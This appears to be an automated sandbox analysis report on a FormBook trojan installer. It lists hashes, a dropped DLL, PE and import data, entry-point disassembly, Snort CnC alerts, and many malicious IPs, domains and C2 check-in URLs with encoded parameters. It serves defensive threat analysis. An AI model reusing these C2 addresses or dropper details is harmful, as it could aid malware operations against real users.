                                                          Sample file name:Nz7NA3F7z7.exe
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:25
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:1
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.evad.winEXE@7/1@11/6
                                                          EGA Information:Failed
                                                          HDC Information:
                                                          • Successful, ratio: 29.2% (good quality ratio 27%)
                                                          • Quality average: 74%
                                                          • Quality standard deviation: 30.7%
                                                          HCA Information:
                                                          • Successful, ratio: 87%
                                                          • Number of executed functions: 98
                                                          • Number of non-executed functions: 64
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .exe
                                                          Warnings:
                                                          • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                          • Excluded IPs from analysis (whitelisted): 52.147.198.201, 204.79.197.200, 13.107.21.200, 93.184.220.29, 104.42.151.234, 104.43.139.144, 13.88.21.125, 52.255.188.83, 184.30.20.56, 51.11.168.160, 8.253.207.121, 8.248.121.254, 67.26.73.254, 8.241.9.126, 8.241.11.254, 23.32.238.177, 23.32.238.234, 20.54.26.129
                                                          • Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          No simulations
                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          103.88.34.80LdryowLXJB.exeGet hashmaliciousBrowse
                                                            b2lTHeTto0.exeGet hashmaliciousBrowse
                                                              PO 120610361.xlsxGet hashmaliciousBrowse
                                                                U6RI0SDRS2.exeGet hashmaliciousBrowse
                                                                  JJux8lxZRj.exeGet hashmaliciousBrowse
                                                                    HBL VRN0924588.xlsxGet hashmaliciousBrowse
                                                                      G6FkfjX5Ow.exeGet hashmaliciousBrowse
                                                                        PO#652.exeGet hashmaliciousBrowse
                                                                          Certificate of Origin- BEIJING & B GROUP.exeGet hashmaliciousBrowse
                                                                            RFQ ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                              osJ3VOYzR5.rtfGet hashmaliciousBrowse
                                                                                BsMdJnus2L.exeGet hashmaliciousBrowse
                                                                                  Order.exeGet hashmaliciousBrowse
                                                                                    217.160.0.23629Order pdf.exeGet hashmaliciousBrowse
                                                                                    • www.investors.black/ca/
                                                                                    34.102.136.180LdryowLXJB.exeGet hashmaliciousBrowse
                                                                                    • www.hakimkhawatmi.com/nsag/?OjQdq6=9Tl2KXc+hK/yUtBx8vpX/czO0Yy7ZBOWuVGV2PRDYpIJ5Hkcqzipl+nucuOR0YYE6jnP&TZ=FjUt0Xc
                                                                                    OVwf3NwhY3.exeGet hashmaliciousBrowse
                                                                                    • www.baldheadbilly.com/hks/?2de=XnzLMfxH&-Z=5DpztBGFNILOUcTfnypBt9Mq+WcGvwdIgNyzFivyJumM76wq3XnPErAuCN247b23uUTG
                                                                                    winlog.exeGet hashmaliciousBrowse
                                                                                    • www.wholeholistichealth.com/ivay/?v6t=48s8GfR0pKAVVGrS/+07uG5rt2JCeQz1hQFFgtKX2hEN3FS1DFrBqQNbglg+QUqIpgZT&nt=VXELdRqP
                                                                                    5CLX0aUFemBe4lP.exeGet hashmaliciousBrowse
                                                                                    • www.southwesterboats.com/ame8/?-Zu8Zp=YibtMwum0SvNFVbrCItddygoWSyUmK+2xk3Efj2vFifRGIdUT04RUA1YqOO5dt88HQdt&Dxlpd=2djD
                                                                                    SecuriteInfo.com.Trojan.Inject4.6572.18135.exeGet hashmaliciousBrowse
                                                                                    • www.pciglass.com/gypo/?lnPh=TxlhfFH&Dz=d9Td64cc51pjWzqk4whrsRBiDMw+Dv5uUAQ+atE4KVcxvy7dCZj3hUtJzXjDyX3Am+PI
                                                                                    dwg.exeGet hashmaliciousBrowse
                                                                                    • www.altsfram.com/ripw/?YL0=8Nf6ku3go9lIx7EXwguFN4u+ozF9cTxTJQgM1N+BjZzk41CS1AxXrTSLzn6fg/LfXfGB&DhAH08=9rzdODV81V
                                                                                    REF221.exeGet hashmaliciousBrowse
                                                                                    • www.odsgroupusa.com/u9cd/?kDKl=LTvbqs2qSrEtu2oc9ZBfGgqoFsGK8OX0N1ikV+MTjRgm8dfiDIllkvRNetIMUSWUkxhOAkjylw==&DzuD=QnjHBx2xo
                                                                                    RtiNKKhckU.exeGet hashmaliciousBrowse
                                                                                    • www.fruitsinbeers.com/ffw/?00D=qBZpAr0pwRYLsZL&ndpLn6c=b6L+UOVcWa0t15ouHTOLrxL7UlkQja/WPpXHKl1ivZgW+/yS0QWwjv+ao5Rg679GBpw8
                                                                                    Order 1759-pdf.exeGet hashmaliciousBrowse
                                                                                    • www.nutritionalproductions.com/uqf5/?EZA0x8=VnpGld+QUK8yus86LK6GeF5MHljAYsKUpXGs/MfXJqKbbzqdskqmJqodOH15iHOn50VuwIzKFw==&GzrLH=VBZlkvuh1J1t_b
                                                                                    RFQ 204871 AGC_pdf.exeGet hashmaliciousBrowse
                                                                                    • www.findingyourbranch.com/nu8e/?GFND=HV9yUONS4KA0L0c6l+CFXH3fe0HX4tKnX8+8FhcVfibHBBFEql21B5XTAFxUltc/rjb1&Jtx=XVy8pRgx
                                                                                    PO 210302-011.exeGet hashmaliciousBrowse
                                                                                    • www.paquitotransportationllc.com/ktz/?PtCXRL2=JMXKl+3K3KPbV/DQYhflj23UNPfz90cW2//Wc9AzMKM4/opGe7L3M2PNiL89l0D2ef/i&V6Ah9=_0GxCdG8B0X0
                                                                                    Invoice-0898764_pdf.exeGet hashmaliciousBrowse
                                                                                    • www.furrytail.pet/xgxp/?tXUt=5n0JhPVaKrchLlfv26Zq4DXM/0jD4q1VDgFEzUPlF2rso9lf6FfSb2aVcmMhvNGx1hUE&Cjp4a=ftxlnN6p
                                                                                    PO_210301.exe.exeGet hashmaliciousBrowse
                                                                                    • www.skatinggoosefarm.com/kbc/?T8Ud-te=kPw0OkDVeBqlX+Nd2sC+wK13jjG9T4wvPDzpBRB+YKHCRzYm9QoPUpP7kZiPd/I11pKc&U48Ho=NtetPLUX-pOH6Vkp
                                                                                    INVOICE-01-03-2021.exeGet hashmaliciousBrowse
                                                                                    • www.idowellbeingoutdoors.com/ame8/?JfEx9PSX=bSNRDfouWmCpHrtSwAzqDtCd7CBFxBanYXSx9p43ryr6wxptuO5mMSKmqsTSCD240kUn&ojn0sr=RVlPdV
                                                                                    8QGglvUeYO.exeGet hashmaliciousBrowse
                                                                                    • www.trucktiresdirect.net/qef6/?FDHH=FQEtPSkz80CxgXgcOOi6rBlloiOK2hGatG8UTKVevdzK7vsAog45RkTrPeFtAvOf/XsI&Rl=VtX4c
                                                                                    SAO_NCL INTER LOGISTICS (S) PTE LTD.exeGet hashmaliciousBrowse
                                                                                    • www.ketamineinfusiontexas.com/vxwp/?FZU4DvG=RX7AK5fteFIPXrRxTwMnWf9UYNTxM3X2CRcDJrKMlPVxj+AOcnrTFr4+xKRfQYA1k/6X&DzrTA=VDKPT4kXex_d1V
                                                                                    payment slip_pdf.exeGet hashmaliciousBrowse
                                                                                    • www.nguyenngoctue.com/hua6/?pP-=EFQDPLp0sdi0&adsDdLr=o3VZw1fcRuoUF3CTAYD7K5r5mFexCmH7Ani/9zaiM9lHi3wZG5vhW6jdHjyNbK5h31Dz
                                                                                    dgKMrfjI84.exeGet hashmaliciousBrowse
                                                                                    • www.harryballard.net/mjs/?t6Ah=CWqPZ4Oyg6xNe2b3vj69wXlmdbu58Oelz2e9RYbKtL17dBFPpmaNgUhksb7z6Z1XRdMj&9r4Tq=J4k0
                                                                                    aQnaI0DXH8l8WfB.exeGet hashmaliciousBrowse
                                                                                    • www.queendreea.club/uszn/?hBZ=LBz6fxh7cOEoWCvBq3hoHfpfB4+EiRnODdzRnTIzYKazzCL+4dFO4b8BXlNrSrzf6UfZ&Wr=LhnLHrv82
                                                                                    Proforma Invoice_pdf_exe.exeGet hashmaliciousBrowse
                                                                                    • www.716hairvault.com/d833/?FnmpG=9ruItk6c2Z/kZuoLN1i47F+GDs8vBByUohgB3wBKdmiJ4kgDRQ+pdmLVThWcaVNAmy3g&alI=J6AheNuHu6I
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    www.856380692.xyzLdryowLXJB.exeGet hashmaliciousBrowse
                                                                                    • 103.88.34.80
                                                                                    b2lTHeTto0.exeGet hashmaliciousBrowse
                                                                                    • 103.88.34.80
                                                                                    PO 120610361.xlsxGet hashmaliciousBrowse
                                                                                    • 103.88.34.80
                                                                                    U6RI0SDRS2.exeGet hashmaliciousBrowse
                                                                                    • 103.88.34.80
                                                                                    JJux8lxZRj.exeGet hashmaliciousBrowse
                                                                                    • 103.88.34.80
                                                                                    HBL VRN0924588.xlsxGet hashmaliciousBrowse
                                                                                    • 103.88.34.80
                                                                                    G6FkfjX5Ow.exeGet hashmaliciousBrowse
                                                                                    • 103.88.34.80
                                                                                    www.myfeezinc.comG6FkfjX5Ow.exeGet hashmaliciousBrowse
                                                                                    • 103.224.182.242
                                                                                    www.usopencoverage.comLdryowLXJB.exeGet hashmaliciousBrowse
                                                                                    • 94.136.40.51
                                                                                    U6RI0SDRS2.exeGet hashmaliciousBrowse
                                                                                    • 94.136.40.51
                                                                                    www.worldsourcecloud.comHBL VRN0924588.xlsxGet hashmaliciousBrowse
                                                                                    • 104.21.78.148
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    CLOUDFLARENETUSPI_2994_Feb 2021.xlsxGet hashmaliciousBrowse
                                                                                    • 172.67.183.193
                                                                                    NEW_ORDER_Hr02715499.exeGet hashmaliciousBrowse
                                                                                    • 104.21.78.8
                                                                                    Quotation 1.PDF______________________________________.exeGet hashmaliciousBrowse
                                                                                    • 172.67.179.188
                                                                                    REQUEST FOR QUOTATION 4675674665.exeGet hashmaliciousBrowse
                                                                                    • 172.67.179.188
                                                                                    Quotation 2.PDF__________________________________.exeGet hashmaliciousBrowse
                                                                                    • 172.67.179.188
                                                                                    PRODUCT CTG. ORDER.exeGet hashmaliciousBrowse
                                                                                    • 172.67.188.154
                                                                                    SHIPMENT DOCUMENT_Pdf.exeGet hashmaliciousBrowse
                                                                                    • 172.67.188.154
                                                                                    ORIENT_New #Uc8fc#Ubb38 OCI_0303202.exeGet hashmaliciousBrowse
                                                                                    • 104.21.19.200
                                                                                    PPG Industries PO.exeGet hashmaliciousBrowse
                                                                                    • 104.21.19.200
                                                                                    atlas order.exeGet hashmaliciousBrowse
                                                                                    • 104.21.19.200
                                                                                    6576456356456576455364565_564665_PDF.exeGet hashmaliciousBrowse
                                                                                    • 104.21.19.200
                                                                                    QZYgzEOZdEYzp6N.exeGet hashmaliciousBrowse
                                                                                    • 172.67.188.154
                                                                                    winlog.exeGet hashmaliciousBrowse
                                                                                    • 104.21.63.30
                                                                                    Swift Copy For Pending payments.exeGet hashmaliciousBrowse
                                                                                    • 172.67.188.154
                                                                                    SecuriteInfo.com.Trojan.Inject4.6572.18135.exeGet hashmaliciousBrowse
                                                                                    • 23.227.38.74
                                                                                    SecuriteInfo.com.W32.AIDetect.malware2.23154.dllGet hashmaliciousBrowse
                                                                                    • 104.20.185.68
                                                                                    PO#BC210243_pdf.exeGet hashmaliciousBrowse
                                                                                    • 172.67.179.188
                                                                                    10.dllGet hashmaliciousBrowse
                                                                                    • 104.20.185.68
                                                                                    SHIPMENT DOCUMENTS_INV PLS DRAFT PDF.exeGet hashmaliciousBrowse
                                                                                    • 162.159.129.233
                                                                                    New Enquiry RFQ#5500298704.exeGet hashmaliciousBrowse
                                                                                    • 172.67.188.154
                                                                                    CHINATELECOM-ZHEJIANG-NINGBO-IDCNINGBOZHEJIANGProvinceLdryowLXJB.exeGet hashmaliciousBrowse
                                                                                    • 103.88.34.80
                                                                                    b2lTHeTto0.exeGet hashmaliciousBrowse
                                                                                    • 103.88.34.80
                                                                                    PO 120610361.xlsxGet hashmaliciousBrowse
                                                                                    • 103.88.34.80
                                                                                    U6RI0SDRS2.exeGet hashmaliciousBrowse
                                                                                    • 103.88.34.80
                                                                                    JJux8lxZRj.exeGet hashmaliciousBrowse
                                                                                    • 103.88.34.80
                                                                                    HBL VRN0924588.xlsxGet hashmaliciousBrowse
                                                                                    • 103.88.34.80
                                                                                    G6FkfjX5Ow.exeGet hashmaliciousBrowse
                                                                                    • 103.88.34.80
                                                                                    PO#652.exeGet hashmaliciousBrowse
                                                                                    • 103.88.34.80
                                                                                    1.exeGet hashmaliciousBrowse
                                                                                    • 115.231.37.46
                                                                                    c5twLLnwwY.exeGet hashmaliciousBrowse
                                                                                    • 115.238.187.35
                                                                                    Certificate of Origin- BEIJING & B GROUP.exeGet hashmaliciousBrowse
                                                                                    • 103.88.34.80
                                                                                    RFQ ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                                    • 103.88.34.80
                                                                                    osJ3VOYzR5.rtfGet hashmaliciousBrowse
                                                                                    • 103.88.34.80
                                                                                    BsMdJnus2L.exeGet hashmaliciousBrowse
                                                                                    • 103.88.34.80
                                                                                    Order.exeGet hashmaliciousBrowse
                                                                                    • 103.88.34.80
                                                                                    1ny56UuROk.exeGet hashmaliciousBrowse
                                                                                    • 115.231.186.230
                                                                                    http://haozip.2345cdn.net:80/2345haozip/2345haozip_v6.2.0.11026_up.exeGet hashmaliciousBrowse
                                                                                    • 183.136.203.31
                                                                                    ONEANDONE-ASBrauerstrasse48DEwinlog.exeGet hashmaliciousBrowse
                                                                                    • 74.208.236.79
                                                                                    TRANF1.exeGet hashmaliciousBrowse
                                                                                    • 212.227.15.158
                                                                                    FACT21002329.exeGet hashmaliciousBrowse
                                                                                    • 213.165.67.102
                                                                                    Order 1759-pdf.exeGet hashmaliciousBrowse
                                                                                    • 217.160.0.115
                                                                                    j81SoD9q5b.xlsGet hashmaliciousBrowse
                                                                                    • 87.106.18.141
                                                                                    payment slip_pdf.exeGet hashmaliciousBrowse
                                                                                    • 217.160.0.193
                                                                                    2AWamkLYry.exeGet hashmaliciousBrowse
                                                                                    • 74.208.236.223
                                                                                    mVxZxsQdkU.exeGet hashmaliciousBrowse
                                                                                    • 74.208.5.15
                                                                                    Gewinncode-32532404.docmGet hashmaliciousBrowse
                                                                                    • 217.160.127.137
                                                                                    Gewinncode-32532404.docmGet hashmaliciousBrowse
                                                                                    • 195.20.250.184
                                                                                    Gewinncode-32532404.docmGet hashmaliciousBrowse
                                                                                    • 217.160.127.137
                                                                                    Rep_#_475.xlsmGet hashmaliciousBrowse
                                                                                    • 74.208.236.89
                                                                                    Rep_#_475.xlsmGet hashmaliciousBrowse
                                                                                    • 74.208.236.89
                                                                                    Rep_#_475.xlsmGet hashmaliciousBrowse
                                                                                    • 74.208.236.89
                                                                                    malware.exeGet hashmaliciousBrowse
                                                                                    • 213.165.67.118
                                                                                    Betalingsadvies Opmerking.exeGet hashmaliciousBrowse
                                                                                    • 212.227.15.142
                                                                                    42#U0438.exeGet hashmaliciousBrowse
                                                                                    • 212.227.15.142
                                                                                    WYX-09901.exeGet hashmaliciousBrowse
                                                                                    • 212.227.15.142
                                                                                    530000.exeGet hashmaliciousBrowse
                                                                                    • 82.165.103.72
                                                                                    raLXirFBY1.exeGet hashmaliciousBrowse
                                                                                    • 66.175.232.221
                                                                                    No context
                                                                                    No context
                                                                                    C:\Users\user\AppData\Local\Temp\nso7CE9.tmp\eeysn2cunceh9.dll
                                                                                    Process:C:\Users\user\Desktop\Nz7NA3F7z7.exe
                                                                                    File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):176128
                                                                                    Entropy (8bit):7.971614479763184
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:95WI46AkCIXhdko1AN8MwbvB9pLUvMIeHoZGCCY0E41LyJDvrHHXRMt2oLLq5TyT:9kIdfiKMS9pQkI5Z41eJvqt24L2Pi
                                                                                    MD5:814667786976E62B068D1AF3ED8CCDDE
                                                                                    SHA1:8A1987B2898F5B4B4CA70C0878A26EAED9EBF9FE
                                                                                    SHA-256:AB8C33787270929DF3827A53DF0C17D4EA962602A3FEDDD01586F7ABC679758A
                                                                                    SHA-512:F9FC7F0473FFFA2516951BF15F9C076F206667F121A692F6D93B0733344D1D02CC320FB4D29FD6B8E0B24AE65200050DBDC4807FF984193CA07A82BED56668E4
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    Reputation:low
                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B............aW8.....aW=.............%.......%.......%.......%.......Rich............PE..L...Q.?`...........!.........&............... ...............................p............@A......................... ..T....!.......P.......................`..X.................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........P.......*..............@..B.reloc..X....`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                    Entropy (8bit):7.900612739713547
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:Nz7NA3F7z7.exe
                                                                                    File size:223664
                                                                                    MD5:059a1308ebdfae6ee52fd646d341aeac
                                                                                    SHA1:4bea37c03b3e0ad1ccdea6675819f363c881bf39
                                                                                    SHA256:ff9b0f1788f165edd1e2811c182a990a352a12453706f85d90eaac2601597862
                                                                                    SHA512:32f11ec1c9879595f8f27b26993a6836e88e9d4ec70b4edcf4966078d5ce6d2e736b16cf642966ef76ebad3f09610dd20c0538638493f25b67351da08bcd1552
                                                                                    SSDEEP:6144:l8LxBjiTyzV71F8FIdfiKMSSpQkIOZ41eJMqt24L2Qi:0tVDqIFiKMSSpTIOZNOqt2Gq
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...m:.V.................`..........*1.......p....@

                                                                                    File Icon

                                                                                    Icon Hash:00828e8e8686b000

                                                                                    General

                                                                                    Entrypoint:0x40312a
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x56FF3A6D [Sat Apr 2 03:20:13 2016 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:b76363e9cb88bf9390860da8e50999d2
                                                                                    Instruction
                                                                                    sub esp, 00000184h
                                                                                    push ebx
                                                                                    push ebp
                                                                                    push esi
                                                                                    push edi
                                                                                    xor ebx, ebx
                                                                                    push 00008001h
                                                                                    mov dword ptr [esp+20h], ebx
                                                                                    mov dword ptr [esp+14h], 00409168h
                                                                                    mov dword ptr [esp+1Ch], ebx
                                                                                    mov byte ptr [esp+18h], 00000020h
                                                                                    call dword ptr [004070B0h]
                                                                                    call dword ptr [004070ACh]
                                                                                    cmp ax, 00000006h
                                                                                    je 00007F01748AFEC3h
                                                                                    push ebx
                                                                                    call 00007F01748B2CA4h
                                                                                    cmp eax, ebx
                                                                                    je 00007F01748AFEB9h
                                                                                    push 00000C00h
                                                                                    call eax
                                                                                    mov esi, 00407280h
                                                                                    push esi
                                                                                    call 00007F01748B2C20h
                                                                                    push esi
                                                                                    call dword ptr [00407108h]
                                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                                    cmp byte ptr [esi], bl
                                                                                    jne 00007F01748AFE9Dh
                                                                                    push 0000000Dh
                                                                                    call 00007F01748B2C78h
                                                                                    push 0000000Bh
                                                                                    call 00007F01748B2C71h
                                                                                    mov dword ptr [0042EC24h], eax
                                                                                    call dword ptr [00407038h]
                                                                                    push ebx
                                                                                    call dword ptr [0040726Ch]
                                                                                    mov dword ptr [0042ECD8h], eax
                                                                                    push ebx
                                                                                    lea eax, dword ptr [esp+38h]
                                                                                    push 00000160h
                                                                                    push eax
                                                                                    push ebx
                                                                                    push 00429058h
                                                                                    call dword ptr [0040715Ch]
                                                                                    push 0040915Ch
                                                                                    push 0042E420h
                                                                                    call 00007F01748B28A4h
                                                                                    call dword ptr [0040710Ch]
                                                                                    mov ebp, 00434000h
                                                                                    push eax
                                                                                    push ebp
                                                                                    call 00007F01748B2892h
                                                                                    push ebx
                                                                                    call dword ptr [00407144h]
                                                                                    Programming Language:
                                                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x75240xa0.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000x648.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x5e660x6000False0.670572916667data6.44065573436IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x70000x12a20x1400False0.4455078125data5.0583287871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0x90000x25d180x600False0.458984375data4.18773476617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                    .ndata0x2f0000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0x370000x6480x800False0.38427734375data3.87782977991IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    NameRVASizeTypeLanguageCountry
                                                                                    RT_DIALOG0x371000x100dataEnglishUnited States
                                                                                    RT_DIALOG0x372000x11cdataEnglishUnited States
                                                                                    RT_DIALOG0x3731c0x60dataEnglishUnited States
                                                                                    RT_MANIFEST0x3737c0x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                                                                                    DLLImport
                                                                                    KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                                                                    USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                                                                    GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                    SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                                                                                    ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                    ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    EnglishUnited States

                                                                                    Network Behavior

                                                                                    Download Network PCAP: filteredfull

                                                                                    Snort IDS Alerts

                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                    03/03/21-08:08:07.990852TCP1201ATTACK-RESPONSES 403 Forbidden8049728172.67.223.7192.168.2.3
                                                                                    03/03/21-08:08:49.862537TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973980192.168.2.3184.168.131.241
                                                                                    03/03/21-08:08:49.862537TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973980192.168.2.3184.168.131.241
                                                                                    03/03/21-08:08:49.862537TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973980192.168.2.3184.168.131.241
                                                                                    03/03/21-08:09:11.130257TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974280192.168.2.334.102.136.180
                                                                                    03/03/21-08:09:11.130257TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974280192.168.2.334.102.136.180
                                                                                    03/03/21-08:09:11.130257TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974280192.168.2.334.102.136.180
                                                                                    03/03/21-08:09:11.269534TCP1201ATTACK-RESPONSES 403 Forbidden804974234.102.136.180192.168.2.3
                                                                                    03/03/21-08:09:22.671721TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974480192.168.2.391.195.240.94
                                                                                    03/03/21-08:09:22.671721TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974480192.168.2.391.195.240.94
                                                                                    03/03/21-08:09:22.671721TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974480192.168.2.391.195.240.94

                                                                                    Network Port Distribution

